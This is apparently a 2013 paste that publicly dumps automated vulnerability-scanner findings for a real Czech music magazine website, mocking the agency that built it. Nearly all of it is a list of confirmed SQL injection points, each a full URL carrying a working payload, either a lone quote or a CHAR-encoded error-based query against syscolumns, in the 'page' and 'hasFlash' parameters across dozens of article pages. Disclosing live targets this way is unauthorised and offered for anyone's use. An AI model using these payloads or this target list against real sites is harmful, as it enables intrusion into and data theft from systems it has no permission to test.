sroub3k

rockandpop.cz

Feb 9th, 2013
  1. +++++++++++++++++++++++
  2. Sherwood Internet agency I know is a tough kick in the form of critical errors in the music magazine :)
  3. --- >> http://www.sherwood.cz
  4. +++++++++++++++++++++++
  5.  
  6. [High Possibility] SQL Injection
  7.  
  8. Severity: Critical
  9. Confirmation: Confirmed
  10. URL: http://www.rockandpop.cz/zpravy/?page=%27
  11. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  12. Parameter Name: page
  13. Parameter Type: Querystring
  14. Attack Pattern: %27
  15.  
  16. Severity: Critical
  17. Confirmation: Confirmed
  18. URL: http://www.rockandpop.cz/recenze/?page=%27
  19. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  20. Parameter Name: page
  21. Parameter Type: Querystring
  22. Attack Pattern: %27
  23.  
  24. Severity: Critical
  25. Confirmation: Confirmed
  26. URL: http://www.rockandpop.cz/live/?page=%27
  27. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  28. Parameter Name: page
  29. Parameter Type: Querystring
  30. Attack Pattern: %27
  31.  
  32. Severity: Critical
  33. Confirmation: Confirmed
  34. URL: http://www.rockandpop.cz/clanky/?page=%27
  35. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  36. Parameter Name: page
  37. Parameter Type: Querystring
  38. Attack Pattern: %27
  39.  
  40. Severity: Critical
  41. Confirmation: Confirmed
  42. URL: http://www.rockandpop.cz/casopis/?page=%27
  43. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  44. Parameter Name: page
  45. Parameter Type: Querystring
  46. Attack Pattern: %27
  47.  
  48. Severity: Critical
  49. Confirmation: Confirmed
  50. URL: http://www.rockandpop.cz/zpravy/zahranicni/?page=%27
  51. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  52. Parameter Name: page
  53. Parameter Type: Querystring
  54. Attack Pattern: %27
  55.  
  56. Severity: Critical
  57. Confirmation: Confirmed
  58. URL: http://www.rockandpop.cz/video/?page='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  59. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  60. Parameter Name: page
  61. Parameter Type: Querystring
  62. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  63.  
  64. Severity: Critical
  65. Confirmation: Confirmed
  66. URL: http://www.rockandpop.cz/zpravy/domaci/koncem-mesice-vyda-vydavatelstvi-emi-jedinecne-album-soliteri/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  67. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  68. Parameter Name: hasFlash
  69. Parameter Type: Querystring
  70. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  71.  
  72. Severity: Critical
  73. URL: http://www.rockandpop.cz/zpravy/domaci/koncem-mesice-vyda-vydavatelstvi-emi-jedinecne-album-soliteri/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  74. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  75. Parameter Name:
  76. Parameter Type: Querystring
  77. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  78.  
  79. Severity: Critical
  80. Confirmation: Confirmed
  81. URL: http://www.rockandpop.cz/zpravy/zahranicni/poznejte-obycejny-den-na-turne-prostrednictvim-noveho-videoklipu-the-ghost-inside/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  82. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  83. Parameter Name: hasFlash
  84. Parameter Type: Querystring
  85. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  86.  
  87.  
  88. Severity: Critical
  89. Confirmation: Confirmed
  90. URL: http://www.rockandpop.cz/zpravy/zahranicni/poznejte-obycejny-den-na-turne-prostrednictvim-noveho-videoklipu-the-ghost-inside/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  91. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  92. Parameter Name:
  93. Parameter Type: Querystring
  94. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  95.  
  96. Severity: Critical
  97. Confirmation: Confirmed
  98. URL: http://www.rockandpop.cz/zpravy/domaci/britska-zpevacka-jessie-ware-se-tesi-na-evropske-turne/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  99. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  100. Parameter Name: hasFlash
  101. Parameter Type: Querystring
  102. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  103.  
  104. Severity: Critical
  105. Confirmation: Confirmed
  106. URL: http://www.rockandpop.cz/zpravy/domaci/britska-zpevacka-jessie-ware-se-tesi-na-evropske-turne/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  107. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  108. Parameter Name:
  109. Parameter Type: Querystring
  110. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  111.  
  112. Severity: Critical
  113. Confirmation: Confirmed
  114. URL: http://www.rockandpop.cz/zpravy/domaci/prazsky-vyber-zverejnil-jmena-hostu-jarniho-turne/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  115. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  116. Parameter Name: hasFlash
  117. Parameter Type: Querystring
  118. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  119.  
  120. Severity: Critical
  121. Confirmation: Confirmed
  122. URL: http://www.rockandpop.cz/zpravy/domaci/prazsky-vyber-zverejnil-jmena-hostu-jarniho-turne/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  123. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  124. Parameter Name:
  125. Parameter Type: Querystring
  126. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  127.  
  128. Severity: Critical
  129. Confirmation: Confirmed
  130. URL: http://www.rockandpop.cz/zpravy/zahranicni/marilyn-manson-zkolaboval-v-prubehu-koncertu/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  131. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  132. Parameter Name: hasFlash
  133. Parameter Type: Querystring
  134. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  135.  
  136. Severity: Critical
  137. Confirmation: Confirmed
  138. URL: http://www.rockandpop.cz/zpravy/zahranicni/marilyn-manson-zkolaboval-v-prubehu-koncertu/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  139. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  140. Parameter Name:
  141. Parameter Type: Querystring
  142. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  143.  
  144. Severity: Critical
  145. Confirmation: Confirmed
  146. URL: http://www.rockandpop.cz/zpravy/zahranicni/americti-confide-se-hlasi-ze-studia-a-pridavaji-ochutnavku/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  147. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  148. Parameter Name: hasFlash
  149. Parameter Type: Querystring
  150. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  151.  
  152. Severity: Critical
  153. Confirmation: Confirmed
  154. URL: http://www.rockandpop.cz/zpravy/zahranicni/americti-confide-se-hlasi-ze-studia-a-pridavaji-ochutnavku/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  155. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  156. Parameter Name:
  157. Parameter Type: Querystring
  158. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  159.  
  160. Severity: Critical
  161. Confirmation: Confirmed
  162. URL: http://www.rockandpop.cz/zpravy/domaci/o5-a-radecek-opici-turne-zacne-koncertem-v-primem-prenosu/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  163. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  164. Parameter Name: hasFlash
  165. Parameter Type: Querystring
  166. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  167.  
  168. Severity: Critical
  169. Confirmation: Confirmed
  170. URL: http://www.rockandpop.cz/zpravy/domaci/o5-a-radecek-opici-turne-zacne-koncertem-v-primem-prenosu/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  171. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  172. Parameter Name:
  173. Parameter Type: Querystring
  174. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  175.  
  176.  
  177. Severity: Critical
  178. Confirmation: Confirmed
  179. URL: http://www.rockandpop.cz/zpravy/domaci/monkey-business-vydaji-nove-album-a-vyjedou-na-turne/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  180. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  181. Parameter Name: hasFlash
  182. Parameter Type: Querystring
  183. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  184.  
  185. Severity: Critical
  186. Confirmation: Confirmed
  187. URL: http://www.rockandpop.cz/zpravy/domaci/monkey-business-vydaji-nove-album-a-vyjedou-na-turne/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  188. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  189. Parameter Name:
  190. Parameter Type: Querystring
  191. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  192.  
  193.  
  194. Severity: Critical
  195. Confirmation: Confirmed
  196. URL: http://www.rockandpop.cz/zpravy/domaci/chiki-liki-tu-a:-1000-koncertov-15-krajin-a-230-miest/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  197. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  198. Parameter Name: hasFlash
  199. Parameter Type: Querystring
  200. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  201.  
  202. Severity: Critical
  203. Confirmation: Confirmed
  204. URL: http://www.rockandpop.cz/zpravy/domaci/chiki-liki-tu-a:-1000-koncertov-15-krajin-a-230-miest/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  205. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  206. Parameter Name:
  207. Parameter Type: Querystring
  208. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  209.  
  210. Severity: Critical
  211. Confirmation: Confirmed
  212. URL: http://www.rockandpop.cz/zpravy/zahranicni/bruno-mars-predstavuje-klip-k-singlu-when-i-was-your-man/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  213. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  214. Parameter Name: hasFlash
  215. Parameter Type: Querystring
  216. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  217.  
  218. Severity: Critical
  219. Confirmation: Confirmed
  220. URL: http://www.rockandpop.cz/zpravy/zahranicni/bruno-mars-predstavuje-klip-k-singlu-when-i-was-your-man/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  221. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  222. Parameter Name:
  223. Parameter Type: Querystring
  224. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  225.  
  226. Severity: Critical
  227. Confirmation: Confirmed
  228. URL: http://www.rockandpop.cz/zpravy/zahranicni/kanadsti-billy-talent-prichazeji-s-novym-videoklipem/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  229. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  230. Parameter Name: hasFlash
  231. Parameter Type: Querystring
  232. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  233.  
  234. Severity: Critical
  235. Confirmation: Confirmed
  236. URL: http://www.rockandpop.cz/zpravy/zahranicni/my-chemical-romance-streamuji-posledni-cast--conventional-weapons/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  237. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  238. Parameter Name:
  239. Parameter Type: Querystring
  240. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  241.  
  242. Severity: Critical
  243. Confirmation: Confirmed
  244. URL: http://www.rockandpop.cz/live/young-guns-your-demise-criminal-colection-9-11-rock-cafe-praha/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  245. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  246. Parameter Name: hasFlash
  247. Parameter Type: Querystring
  248. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  249.  
  250. Severity: Critical
  251. Confirmation: Confirmed
  252. URL: http://www.rockandpop.cz/foto/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  253. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  254. Parameter Name:
  255. Parameter Type: Querystring
  256. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  257.  
  258. Severity: Critical
  259. Confirmation: Confirmed
  260. URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  261. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  262. Parameter Name: hasFlash
  263. Parameter Type: Querystring
  264. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  265.  
  266. Severity: Critical
  267. Confirmation: Confirmed
  268. URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  269. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  270. Parameter Name:
  271. Parameter Type: Querystring
  272. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  273.  
  274. Severity: Critical
  275. Confirmation: Confirmed
  276. URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/tribal-theory-funky-rock-n-roll-ze-zapadnich-cech/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  277. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  278. Parameter Name: hasFlash
  279. Parameter Type: Querystring
  280. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  281.  
  282. Severity: Critical
  283. Confirmation: Confirmed
  284. URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/tribal-theory-funky-rock-n-roll-ze-zapadnich-cech/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  285. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  286. Parameter Name:
  287. Parameter Type: Querystring
  288. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  289.  
  290. Severity: Critical
  291. Confirmation: Confirmed
  292. URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/overhype-nadejna-kapela-z-brna/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  293. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  294. Parameter Name: hasFlash
  295. Parameter Type: Querystring
  296. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  297.  
  298.  
  299. Severity: Critical
  300. Confirmation: Confirmed
  301. URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/overhype-nadejna-kapela-z-brna/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  302. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  303. Parameter Name:
  304. Parameter Type: Querystring
  305. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  306.  
  307. Severity: Critical
  308. Confirmation: Confirmed
  309. URL: http://www.rockandpop.cz/video/rock-pop-tv-jiz-brzy/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  310. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  311. Parameter Name: hasFlash
  312. Parameter Type: Querystring
  313. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  314.  
  315. Severity: Critical
  316. Confirmation: Confirmed
  317. URL: http://www.rockandpop.cz/video/rock-pop-tv-jiz-brzy/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  318. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  319. Parameter Name:
  320. Parameter Type: Querystring
  321. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  322.  
  323. Severity: Critical
  324. Confirmation: Confirmed
  325. URL: http://www.rockandpop.cz/video/branit-ve-cteni-casopisu-rock-pop-se-nevyplaci/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  326. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  327. Parameter Name: hasFlash
  328. Parameter Type: Querystring
  329. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  330.  
  331. Severity: Critical
  332. Confirmation: Confirmed
  333. URL: http://www.rockandpop.cz/video/20-narozeniny-s-rock-pop-a-imodium/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  334. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  335. Parameter Name: hasFlash
  336. Parameter Type: Querystring
